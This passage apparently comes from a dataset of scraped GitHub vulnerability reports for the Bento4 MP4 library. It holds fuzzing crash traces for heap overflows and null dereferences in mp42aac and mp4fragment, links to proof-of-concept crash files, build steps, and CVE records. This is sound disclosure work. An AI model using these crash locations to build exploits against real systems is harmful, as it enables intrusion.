/home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleDescription.cpp:138:41 #6 0x52a4d0 in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleDescription.h:258:9 #7 0x52a4d0 in AP4_AudioSampleEntry::ToSampleDescription() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleEntry.cpp:625:16 #8 0x547f18 in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:181:53 #9 0x4c77b8 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:268:39 #10 0x7fe70ea9d082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x41c8ed in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x41c8ed) 0x6190000009a0 is located 0 bytes to the right of 1056-byte region [0x619000000580,0x6190000009a0) allocated by thread T0 here: #0 0x4c48ad in operator new[](unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x4c48ad) #1 0x4d7b67 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:210:28 #2 0x4d7b67 in AP4_DataBuffer::SetBufferSize(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:136:16 #3 0x4d7b67 in AP4_DataBuffer::Reserve(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:107:12 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x49452f) in __asan_memcpy Shadow bytes around the buggy address: 0x0c327fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8130: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==72210==ABORTING ``` ### **Crash input:** [poc.zip](https://github.com/axiomatic-systems/Bento4/files/14737778/poc.zip) [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/14742678/poc1.zip) ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp42aac input /dev/null ``` ### **环境** ``` Ubuntu 20.04 LTS Bento v1.6.0-641 ```
Heap-buffer-overflow with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/939/comments
0
2024-03-25T01:47:30Z
2024-03-25T11:23:45Z
https://github.com/axiomatic-systems/Bento4/issues/939
2,204,715,905
939
[ -0.02213333360850811, -0.0017176206456497312, -0.019634976983070374, -0.007451086770743132, 0.02860794961452484, -0.011823211796581745, -0.04423147812485695, 0.04124048724770546, -0.007407101336866617, 0.030244197696447372, -0.0029338104650378227, 0.014717435464262962, 0.02721801958978176, ...
1,127
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Heap-buffer-overflow with ASAN in mp42aac Issue date: --- start body --- Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output ``` ================================================================= ==3304149==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000160 at pc 0x00000055f635 bp 0x7ffce575b390 sp 0x7ffce575b388 READ of size 1 at 0x602000000160 thread T0 #0 0x55f634 in AP4_BitReader::ReadCache() const /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Utils.cpp:447:40 #1 0x55f634 in AP4_BitReader::ReadBits(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Utils.cpp:467:40 #2 0x689547 in AP4_Dac4Atom::AP4_Dac4Atom(unsigned int, unsigned char const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Dac4Atom.cpp:238:75 #3 0x68023a in AP4_Dac4Atom::Create(unsigned int, AP4_ByteStream&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Dac4Atom.cpp:58:16 #4 0x5e0d23 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:776:24 #5 0x5dbfaf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #6 0x66f83f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #7 0x5282fe in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleEntry.cpp:420:5 #8 0x4eea5d in AP4_EncaSampleEntry::AP4_EncaSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Protection.cpp:74:5 #9 0x5df5d5 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:298:24 #10 0x5dbfaf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #11 0x5424ae in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:101:13 #12 0x53f61b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:57:16 #13 0x5df866 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:458:20 #14 0x5dbfaf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #15 0x5dafb8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #16 0x4dac06 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:104:12 #17 0x4db68f in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:78:5 #18 0x4c7733 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #19 0x7f0af5948082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #20 0x41c8ed in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x41c8ed) 0x602000000160 is located 0 bytes to the right of 16-byte region [0x602000000150,0x602000000160) allocated by thread T0 here: #0 0x4c48ad in operator new[](unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x4c48ad) #1 0x4d7ec3 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:210:28 #2 0x4d7ec3 in AP4_DataBuffer::SetBufferSize(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:136:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Utils.cpp:447:40 in AP4_BitReader::ReadCache() const Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8010: fa fa 04 fa fa fa fd fa fa fa 01 fa fa fa 00 fa =>0x0c047fff8020: fa fa 00 07 fa fa 00 07 fa fa 00 00[fa]fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3304149==ABORTING ``` ``` ================================================================= ==72210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000009a0 at pc 0x000000494530 bp 0x7fffba3cc440 sp 0x7fffba3cbc08 WRITE of size 4294967280 at 0x6190000009a0 thread T0 #0 0x49452f in __asan_memcpy (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x49452f) #1 0x4d2f73 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:785:5 #2 0x4ca625 in AP4_ByteStream::Write(void const*, unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:77:29 #3 0x66a336 in AP4_CencSampleEncryption::DoWriteFields(AP4_ByteStream&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4CommonEncryption.cpp:3569:16 #4 0x5ae219 in AP4_Atom::Clone() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:316:9 #5 0x509fd4 in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleDescription.cpp:138:41 #6 0x52a4d0 in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleDescription.h:258:9 #7 0x52a4d0 in AP4_AudioSampleEntry::ToSampleDescription() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleEntry.cpp:625:16 #8 0x547f18 in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:181:53 #9 0x4c77b8 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:268:39 #10 0x7fe70ea9d082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x41c8ed in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x41c8ed) 0x6190000009a0 is located 0 bytes to the right of 1056-byte region [0x619000000580,0x6190000009a0) allocated by thread T0 here: #0 0x4c48ad in operator new[](unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x4c48ad) #1 0x4d7b67 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:210:28 #2 0x4d7b67 in AP4_DataBuffer::SetBufferSize(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:136:16 #3 0x4d7b67 in AP4_DataBuffer::Reserve(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:107:12 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x49452f) in __asan_memcpy Shadow bytes around the buggy address: 0x0c327fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8130: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==72210==ABORTING ``` ### **Crash input:** [poc.zip](https://github.com/axiomatic-systems/Bento4/files/14737778/poc.zip) [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/14742678/poc1.zip) ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp42aac input /dev/null ``` ### **环境** ``` Ubuntu 20.04 LTS Bento v1.6.0-641 ``` --- end body --- comments : --- start comments --- --- end comments ---
11,051
CVE-2024-31004
2024-04-02T08:16:10.720
An issue in Bento4 Bento v.1.6.0-641 allows a remote attacker to execute arbitrary code via the Ap4StsdAtom.cpp,AP4_StsdAtom::AP4_StsdAtom,mp4fragment.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/axiomatic-systems/Bento4/issues/941" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/zhangteng0526/CVE-information/blob/main/CVE-2024-31004" } ]
null
null
[ "axiomatic-systems", "Bento4" ]
Issue
Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output ``` unable to autodetect fragment duration, using default AddressSanitizer:DEADLYSIGNAL ================================================================= ==1718535==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006b229c bp 0x60b000000408 sp 0x7ffe5a6079e0 T0) ==1718535==The signal is caused by a READ memory access. ==1718535==Hint: address points to the zero page. #0 0x6b229c in AP4_StsdAtom::AP4_StsdAtom(AP4_SampleTable*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:75:47 #1 0x825ed3 in AP4_SampleTable::GenerateStblAtom(AP4_ContainerAtom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleTable.cpp:59:30 #2 0x6fb497 in AP4_TrakAtom::AP4_TrakAtom(AP4_SampleTable*, unsigned int, char const*, unsigned int, unsigned long long, unsigned long long, unsigned long long, unsigned int, unsigned long long, unsigned short, char const*, unsigned int, unsigned int, unsigned short, unsigned short, int const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4TrakAtom.cpp:131:28 #3 0x6f60dd in AP4_Track::AP4_Track(AP4_SampleTable*, unsigned int, unsigned int, unsigned long long, unsigned int, unsigned long long, AP4_Track const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Track.cpp:183:22 #4 0x4cf67a in Fragment(AP4_File&, AP4_ByteStream&, AP4_Array<TrackCursor*>&, unsigned int, unsigned int, bool, bool, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:360:39 #5 0x4cf67a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:1475:5 #6 0x7f0e35d8b082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c90d in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp4fragment+0x41c90d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:75:47 in AP4_StsdAtom::AP4_StsdAtom(AP4_SampleTable*) ==1718535==ABORTING ``` ``` unable to autodetect fragment duration, using default AddressSanitizer:DEADLYSIGNAL ================================================================= ==1686304==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f80a52d6915 bp 0x7ffe1023fd70 sp 0x7ffe1023f528 T0) ==1686304==The signal is caused by a READ memory access. ==1686304==Hint: address points to the zero page. #0 0x7f80a52d6915 /build/glibc-wuryBv/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65 #1 0x42f3e8 in strlen (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp4fragment+0x42f3e8) #2 0x5e3c2f in AP4_MdhdAtom::AP4_MdhdAtom(unsigned long long, unsigned long long, unsigned int, unsigned long long, char const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4MdhdAtom.cpp:69:9 #3 0x6fb6d1 in AP4_TrakAtom::AP4_TrakAtom(AP4_SampleTable*, unsigned int, char const*, unsigned int, unsigned long long, unsigned long long, unsigned long long, unsigned int, unsigned long long, unsigned short, char const*, unsigned int, unsigned int, unsigned short, unsigned short, int const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4TrakAtom.cpp:143:22 #4 0x6f60dd in AP4_Track::AP4_Track(AP4_SampleTable*, unsigned int, unsigned int, unsigned long long, unsigned int, unsigned long long, AP4_Track const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Track.cpp:183:22 #5 0x4cf67a in Fragment(AP4_File&, AP4_ByteStream&, AP4_Array<TrackCursor*>&, unsigned int, unsigned int, bool, bool, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:360:39 #6 0x4cf67a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:1475:5 #7 0x7f80a5172082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41c90d in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp4fragment+0x41c90d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-wuryBv/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65 ==1686304==ABORTING ``` ### **Crash input:** [poc.zip](https://github.com/axiomatic-systems/Bento4/files/14742865/poc.zip) [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/14742872/poc1.zip) ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp4fragment input /dev/null ``` ### **环境** ``` Ubuntu 20.04 LTS Bento v1.6.0-641 ```
SEGV ASAN in mp4fragment
https://api.github.com/repos/axiomatic-systems/Bento4/issues/941/comments
0
2024-03-25T11:44:04Z
2024-03-25T11:44:04Z
https://github.com/axiomatic-systems/Bento4/issues/941
2,205,549,858
941
[ -0.013229062780737877, 0.012896984815597534, -0.010139964520931244, -0.009143730625510216, 0.030798308551311493, -0.01356114074587822, -0.05510950833559036, 0.04222797229886055, -0.021546458825469017, 0.016063310205936432, -0.014657770283520222, 0.020527057349681854, 0.015090243890881538, ...
1,128
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : SEGV ASAN in mp4fragment Issue date: --- start body --- Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output ``` unable to autodetect fragment duration, using default AddressSanitizer:DEADLYSIGNAL ================================================================= ==1718535==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006b229c bp 0x60b000000408 sp 0x7ffe5a6079e0 T0) ==1718535==The signal is caused by a READ memory access. ==1718535==Hint: address points to the zero page. #0 0x6b229c in AP4_StsdAtom::AP4_StsdAtom(AP4_SampleTable*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:75:47 #1 0x825ed3 in AP4_SampleTable::GenerateStblAtom(AP4_ContainerAtom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleTable.cpp:59:30 #2 0x6fb497 in AP4_TrakAtom::AP4_TrakAtom(AP4_SampleTable*, unsigned int, char const*, unsigned int, unsigned long long, unsigned long long, unsigned long long, unsigned int, unsigned long long, unsigned short, char const*, unsigned int, unsigned int, unsigned short, unsigned short, int const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4TrakAtom.cpp:131:28 #3 0x6f60dd in AP4_Track::AP4_Track(AP4_SampleTable*, unsigned int, unsigned int, unsigned long long, unsigned int, unsigned long long, AP4_Track const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Track.cpp:183:22 #4 0x4cf67a in Fragment(AP4_File&, AP4_ByteStream&, AP4_Array<TrackCursor*>&, unsigned int, unsigned int, bool, bool, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:360:39 #5 0x4cf67a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:1475:5 #6 0x7f0e35d8b082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c90d in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp4fragment+0x41c90d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:75:47 in AP4_StsdAtom::AP4_StsdAtom(AP4_SampleTable*) ==1718535==ABORTING ``` ``` unable to autodetect fragment duration, using default AddressSanitizer:DEADLYSIGNAL ================================================================= ==1686304==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f80a52d6915 bp 0x7ffe1023fd70 sp 0x7ffe1023f528 T0) ==1686304==The signal is caused by a READ memory access. ==1686304==Hint: address points to the zero page. #0 0x7f80a52d6915 /build/glibc-wuryBv/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65 #1 0x42f3e8 in strlen (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp4fragment+0x42f3e8) #2 0x5e3c2f in AP4_MdhdAtom::AP4_MdhdAtom(unsigned long long, unsigned long long, unsigned int, unsigned long long, char const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4MdhdAtom.cpp:69:9 #3 0x6fb6d1 in AP4_TrakAtom::AP4_TrakAtom(AP4_SampleTable*, unsigned int, char const*, unsigned int, unsigned long long, unsigned long long, unsigned long long, unsigned int, unsigned long long, unsigned short, char const*, unsigned int, unsigned int, unsigned short, unsigned short, int const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4TrakAtom.cpp:143:22 #4 0x6f60dd in AP4_Track::AP4_Track(AP4_SampleTable*, unsigned int, unsigned int, unsigned long long, unsigned int, unsigned long long, AP4_Track const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Track.cpp:183:22 #5 0x4cf67a in Fragment(AP4_File&, AP4_ByteStream&, AP4_Array<TrackCursor*>&, unsigned int, unsigned int, bool, bool, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:360:39 #6 0x4cf67a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:1475:5 #7 0x7f80a5172082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41c90d in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp4fragment+0x41c90d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /build/glibc-wuryBv/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65 ==1686304==ABORTING ``` ### **Crash input:** [poc.zip](https://github.com/axiomatic-systems/Bento4/files/14742865/poc.zip) [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/14742872/poc1.zip) ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp4fragment input /dev/null ``` ### **环境** ``` Ubuntu 20.04 LTS Bento v1.6.0-641 ``` --- end body --- comments : --- start comments --- --- end comments ---
5,129
CVE-2024-30806
2024-04-02T18:15:12.397
An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/axiomatic-systems/Bento4/issues/914" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/zhangteng0526/CVE-information/blob/main/CVE-2024-30806" } ]
null
null
[ "axiomatic-systems", "Bento4" ]
Issue
